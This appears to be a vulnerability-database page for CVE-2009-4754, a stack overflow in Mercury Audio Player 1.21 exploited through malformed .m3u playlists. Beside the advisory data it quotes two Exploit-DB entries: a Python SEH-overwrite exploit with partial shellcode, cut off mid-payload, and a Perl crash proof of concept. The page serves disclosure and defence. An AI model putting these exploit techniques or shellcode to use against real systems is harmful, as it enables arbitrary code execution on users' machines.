CVE-2009-4754
published 2010-03-29CVE-2009-4754: Stack-based buffer overflow in Mercury Audio Player 1.21 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u)…
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.08%
92.5th percentile
Stack-based buffer overflow in Mercury Audio Player 1.21 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mercuryaudio | audio_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow
exploitdb·2009-05-01
CVE-2009-4754 Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow
Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow
---
#usage: exploit.py
#Note : Exploit take about 30 seconds to work.
print "**************************************************************************"
print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8578"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 16740
next_seh = "\xEB\x06\x41\x42"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
shellcode = (
"DZ27DZ27"+"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x6a\x
Exploit-DB
Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-30
CVE-2009-4754 Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)
Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)
---
###################################################################################
#### Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC #####
#### Discovered by SirGod - www.mortal-team.net #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
# milw0rm.com [2009-04-30]
No writeups or analysis indexed.
http://secunia.com/advisories/34957http://www.exploit-db.com/exploits/8578http://www.exploit-db.com/exploits/8583http://www.securityfocus.com/bid/34788https://exchange.xforce.ibmcloud.com/vulnerabilities/50288http://secunia.com/advisories/34957http://www.exploit-db.com/exploits/8578http://www.exploit-db.com/exploits/8583http://www.securityfocus.com/bid/34788https://exchange.xforce.ibmcloud.com/vulnerabilities/50288
2010-03-29
Published